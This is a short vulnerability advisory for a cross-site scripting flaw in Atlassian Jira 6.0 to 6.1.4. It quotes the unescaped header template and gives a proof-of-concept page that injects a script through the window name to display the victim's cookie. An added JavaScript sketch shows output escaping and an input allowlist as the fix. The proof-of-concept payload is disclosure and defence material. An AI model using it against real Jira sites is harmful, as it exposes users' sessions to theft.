Atlassian Jira versions 6.1.4 and below suffer from a cross-site scripting vulnerability.
69982c2e62642ecdd6d36596ed6e34438ea61178dc78a728f96a3b398a394b62
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4
# Date: 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com
---[ Vulnerable Code ]---
# Vulnerable Parameter: $window.name
<div class="aui-page-header-main"> <h1>${name}</h1></div>
---[ Proof of Concept ]---
<html><script> var victim=
window.open('https://victim/secure/Dashboard.jspa',
'<script>alert(document.cookie);<\/script>');</script></html>
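
---[ Mitigation sketch (added example) ]---
The template above places ${name} into the <h1> without encoding. The following is an added example, not code from the advisory or from Atlassian: it models that template as a JavaScript string and shows the same header rendered with the value HTML-escaped. The function names and the window-name allowlist are assumptions made for illustration.

```javascript
// Added example. renderHeaderUnsafe mirrors the template quoted in the advisory;
// escapeHtml, renderHeaderSafe, containsScriptTag and isPlainWindowName are
// hypothetical helpers, not Jira APIs.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can change HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": the name is concatenated into markup as-is.
function renderHeaderUnsafe(name) {
  return `<div class="aui-page-header-main"> <h1>${name}</h1></div>`;
}

// "After": the name is treated as text, never as markup.
function renderHeaderSafe(name) {
  return `<div class="aui-page-header-main"> <h1>${escapeHtml(name)}</h1></div>`;
}

// Simple regression check: does rendered output contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth (assumed policy): accept only short, plain window names
// and discard anything else before it reaches a template.
function isPlainWindowName(name) {
  return typeof name === 'string' && /^[\w.\- ]{0,64}$/.test(name);
}

// Constructed sample: the window name used in the proof of concept above.
const sampleName = '<script>alert(document.cookie);</script>';

console.log('unsafe:', renderHeaderUnsafe(sampleName));
console.log('safe:  ', renderHeaderSafe(sampleName));
console.log('plain name?', isPlainWindowName(sampleName));
```

Output encoding at the template is the actual fix; the allowlist only limits what an opener-controlled window name can carry.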